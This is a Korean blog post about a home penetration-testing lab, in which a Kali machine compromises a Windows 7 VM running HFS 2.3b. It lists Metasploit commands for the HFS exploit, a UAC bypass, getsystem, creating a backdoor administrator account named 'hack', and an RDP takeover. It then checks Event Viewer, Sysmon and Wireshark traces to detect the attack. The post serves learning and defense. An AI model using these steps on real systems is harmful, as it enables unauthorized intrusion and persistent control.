[2] hfs 취약점을 이용한 모의해킹

- 2022.08.03 -

 

해당 블로그의 내용에는 실제로 해킹을 하는 과정이 언급되어 있습니다.

모의 해킹의 환경은 100% 사용자가 통제가 가능한 상황에서 실습을 진행하였으며

불법적인 해킹이 아닌 모의 해킹으로써 해킹의 목적이 오롯이 교육의 성격에 초점이 맞추어져 있으며

본 과정을 악용하여 사용하는 2차 피해에 대해서는 행위자가 법적 책임을 질 수 있으며

일어나는 모든 피해에 대해서는 책임지지 않습니다.

---

 

구축 환경

가상 시스템 - 역할 - 운영기반

KALI            |  Attacker | Debian GNU 10 

Windows 7  |  Victim    | Microsoft Windows

 

 

 

IP 목록

Host - IP Address

KALI                | 192.168.52.130

Windows 7      | 192.168.52.128

 

시나리오 내용

로컬 네트워크의 희생자PC에서 실행되고 있는 hfs 프로그램의 취약점을 이용한 시스템 권한획득 및 시스템 장악

더 나아가 침입 탐지까지 확인

 

실습 환경 - 가상 네트워크 환경

공격자

- OS : Kali Linux

-  IP : 192.168.52.130

 

희생자

- OS : Windows 7

- IP : 192.168.52.128

 

---

실습 시작

 

hfs_2.3b 압축 해제

희생자 컴퓨터에서 hfs 2.3b버전을 압축을 풀어주고 아래그림처럼 실행한다.

 

hfs_2.3b 실행

192.168.52.128으로 Local로 hfs로 접속할 수 있다.

 

msfdb 초기화

공격자 Kali Linux에서 msf를 사용하기위해 msfdb를 초기화시켜준다.

sudo msfdb init

 

msfconsole 실행

msfdb를 초기화 후에는 msfconsole를 실행해준다.

sudo msfconsole

msf6> search hfs

msfconsole을 실행 한 뒤 ‘ msf6> ’ 콘솔 창이 뜨고 hfs를 찾는 명령어를 입력한다.

search hfs

Modules Matching

search hfs 이후 매칭되는 모듈을 확인 할 수 있다.

use1을 입력해서 1번 모듈을 사용하고 공격할 IP와 PORT를 지정해주고 공격한다.

use1
set RHOST 192.168.52.128
set RPORT 80
exploit

 

exploit

exploit명령어를 통해 공격을 시작한다.

 

 

희생자 관점의 hfs화면

희생자 관점에서 바라보는 hfs의 화면이다. 2.3b버전의 취약점을 이용해 공격을 하니 hfs의 콘솔창에 위와 같은 메시지들이 출력되었다.

 

 

공격성공

이후 공격자PC로 돌아와 확인해보면 공격이 성공했음을 확인 할 수 있다.

시간이 조금 걸릴 수 있으니 충분히 기다려주자

 

getuid

시스템 권한을 받아오도록 명령어를 입력해본다.

당연히 되지 않는다.

명령어 getuid를 통한 결과를 보면 IE11WIN7\IEUser인데 이는 관리자가 아닌 일반 사용자 계정임을 알 수 있다.

 

background

세션을 잠시 backgrounding 해두고 활성화되어있는 세션을 확인한다

background
sessions -i

 

search bypassuac

그림11번을 보면 사용자계정으로만 로그인이 되는데 이것을 우회할 방법을 찾아야한다.

명령어를 통해 확인하니 2번항목이 적절해 보인다. 사용하도록 하자.

 

search bypassuac
use 2

 

 

exploit!

그림12를 보면 ID가 3번으로 세션이 열려 있는 것을 확인할 수 있다.

그래서 그림13의 bypassuac를 사용하면서 세션 3번으로 셋팅..

그리고 공격을 진행 한다.

 

잠시뒤 성공한 것을 확인한 뒤에는 현재 로그인 상태를 확인하고 관리자권한을 탈취한다.

set SESSION 3
exploit
.
.
.
getuid
getsystem
getuid

계정 생성 및 권한 상승

이후에는 명령어를 이용해 일반 계정을 생성하고 일반 계정을 관리자 그룹으로 포함시켜 권한을 상승한다.

그리고 마지막 명령어를 통해 계정 권한을 확인한다.

shell
net user hack hack /add
net user
net localgroup administrators hack /add
net localgroup administrators

 

exit

exit명령어를 통해 시스템에서 빠져 나온다.

exit

rdesktop 원격연결

그 다음 원격연결을 위해서 rdesktop을 실행하여 희생자컴퓨터로 직접 연결을 시작한다.

그 다음 ‘이 인증서를 신뢰할 수 있습니까?’ 라는 질문이 나오면 yes로 연결을 해주자

sudo rdesktop 192.168.52.128
yes

 

장악 완료!!

컴퓨터에 장악이 된 것을 확인 할 수 있다.

 

시스템상에서 로그 확인하기

이제 조금 더 나아가 시스템안에서 로그를 확인해 보자

이벤트 뷰어에서 ‘TerminalServices-LocalSessionManager’항목에 Operational에서 보면 Remote Desktop Services에서 hack계정으로 IP 192.168.52.130에서 접속한 것이 기록되었다.

 

시스템상에서 로그 확인하기

또한 Sysmon의 로그기록에서 일부 확인해보면 CommandLine으로 내가 조금전에 명령어를 입력했던 항목이 그대로 확인이 된다. 해당 명령어는 그림15를 보면 확인할 수 있다.

 

와이어샤크에서 패킷 잡기

와이어 샤크를 통해 해당 192.168.52.130으로 통신하는 패킷을 하나 잡는다.

마우스 오른쪽 클릭을 눌러 Follow - stream을 눌러서 확인한다.

 

TCP Stream으로 확인

네모 박스가 쳐진 부분을 복사한다.

 

url decoder에 해독해본다.

URL Decorder/Encoder = https://meyerweb.com/eric/tools/dencoder/

위 사이트 URL Decoder에서 조금 전 복사한 내용을 붙여넣고 해독과정을 거친다.

 

 

해독결과

디코드 결과를 보니 어떤 악성코드 파일이 사용되었는지 확인 할 수 있었다

 

악성코드

악성코드 LZobgvKD0B.vbs 라는 파일이 사용된 것을 확인 할 수 있었다.

확장자 vbs는 비쥬얼베이직스튜디오의 약자로 악성코드를 만드는데 가장 많이 사용되어지는 프로그래밍 툴이다.

 

그 앞에는 파일의 경로까지 나와있다.

%TEMP%\LZobgvKD0B.vbs

해당 경로로 가보자

 

악성코드 경로 확인

위 경로대로 %TEMP% 폴더로 들어가니 위에서 언급된 악성코드가 발견되었다.

hfs프로그램의 취약점을 이용해 침투하였으니 당연히 해당 프로그램 경로로 가면 확인 할 수 있다.

 

 

 

 

 

 

---

마   치   며

두번째 취약점을 이용한 모의 해킹이다.

모의 해킹이 생각보다 재미있다.

왜 이 직군에서 하는지 매력이 느껴지는 것 같달까..

안나오면 이상하고 나와서 뚫으면 참 재밌다.

그러면서 동시에 어떻게 방어를 해야할지도 이해가 되가고 있다.

아이러니하지만 이런게 재밌는것 같다.